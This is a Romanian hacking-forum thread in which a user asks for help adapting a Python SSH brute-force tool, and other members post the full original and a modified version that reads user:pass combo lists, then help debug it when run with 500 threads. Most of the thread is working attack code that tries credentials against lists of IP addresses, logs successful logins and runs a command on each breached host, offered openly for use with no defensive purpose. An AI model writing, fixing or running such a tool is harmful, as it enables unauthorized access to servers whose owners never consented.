kmkozeu Posted February 16, 2019 Report Share Posted February 16, 2019 Salut rst, am vazut o sursa de ssh bruteforce in python mai exact a lui @Elohim sursa ia usererele dintr-un fisier diferit si parolele din alt fisier is curios daca poate cineva sa o modifice sa ia din acelasi fisier mai exact ex: pass.txt in fisier sa fie " user:pass " sau "user pass " aveti sursa mai jos, thx import paramiko, sys, Queue, threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip,user,passwd = self.queue.get() self.kraken(ip,user,passwd) self.queue.task_done() def kraken(self,ip,user,passwd): try: if ip in cracked: return False if '%user%' in str(passwd): passwd = passwd.split("%")[0] + user + passwd.split("%")[2] if '%User%' in str(passwd): pwd = user + passwd.split("%")[2] passwd = passwd.split("%")[0]+pwd.title() if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip+' '+user+' '+passwd+'\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write(ip+' '+user+' '+passwd+'\n') nologs.flush() return False val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception, e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip+'\n') bad.flush() #print '\r[+]Tried '+ip+' '+user+' '+passwd+' ' ssh.close() return False #print ip, str(e) ssh.close() return False def brutemain(): if len(sys.argv) < 2: print """ SSH Brute Force Tool Author: @Elohim [RST] Usage: bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* *The filter Switch Takes Either the word "bad" or "no". If you supply the word bad, it filters in bad.txt only the ips which indeed support ssh AUTH and password didn't work""" return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception, e: print 'Cant start more than',i,'Threads!' global bad global val global nologs global cracked global raw cracked = [] bad = open('bad.txt','w') val = open('valid.txt','a') nologs = open('nologins.txt','a') raw = open('raw.txt','a') with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]),'rU') as uf: users = uf.read().splitlines() with open(str(sys.argv[4]),'rU') as pf: passwords = pf.read().splitlines() global dbg dbg = str(sys.argv[5]) try: for password in passwords: for user in users: for ip in ips: queue.put((ip,user,password)) except: pass queue.join() if __name__ == "__main__": brutemain() Quote Link to comment Share on other sites More sharing options...
Turry Posted February 16, 2019 Report Share Posted February 16, 2019 Faci o singura variabila in care tii toate combo-urile id:pass Dupa faci un loop peste combo-uri si faci un split(":") si salvezi primul element in lista cu ID-uri si al doilea element in lista cu pass-uri. Quote Link to comment Share on other sites More sharing options...
Active Members MrGrj Posted February 16, 2019 Active Members Report Share Posted February 16, 2019 import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 'rU') as uf: users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() Quote Link to comment Share on other sites More sharing options...
kmkozeu Posted February 16, 2019 Author Report Share Posted February 16, 2019 5 hours ago, MrGrj said: import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 'rU') as uf: users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() File "t.py", line 16 self.queue.task_done()? ^ SyntaxError: invalid syntax Quote Link to comment Share on other sites More sharing options...
kmkozeu Posted February 16, 2019 Author Report Share Posted February 16, 2019 (edited) 6 hours ago, MrGrj said: import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 'rU') as uf: users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() am rezolvat problema de mai sus, erau pusi ? la sfarsit la 2 linii, acum am alta problema mai exact eroarea asta cate thread-uri pun de atatea ori o da. root@mail:/home/administrator# python t.py 500 ips pass Exception in thread Thread-26: Traceback (most recent call last): File "/usr/lib/python2.7/threading.py", line 810, in __bootstrap_inner self.run() File "t.py", line 15, in run self.kraken(ip, user, passwd) File "t.py", line 24, in kraken dbg = str(sys.argv[4]) IndexError: list index out of range si asta No handlers could be found for logger "paramiko.transport" Edited February 16, 2019 by kmkozeu Quote Link to comment Share on other sites More sharing options...
kmkozeu Posted February 17, 2019 Author Report Share Posted February 17, 2019 cineva? Quote Link to comment Share on other sites More sharing options...
Active Members MrGrj Posted February 19, 2019 Active Members Report Share Posted February 19, 2019 On 2/16/2019 at 8:55 PM, kmkozeu said: File "t.py", line 24, in kraken dbg = str(sys.argv[4]) Trebuie sa mai pui un argument la sfarsitul comenzii: python t.py 500 ips pass bad # adauga asta ^^^ On 2/16/2019 at 8:55 PM, kmkozeu said: No handlers could be found for logger "paramiko.transport" Trebuie sa adaugi asta: paramiko.util.log_to_file("filename.log") Quote Link to comment Share on other sites More sharing options...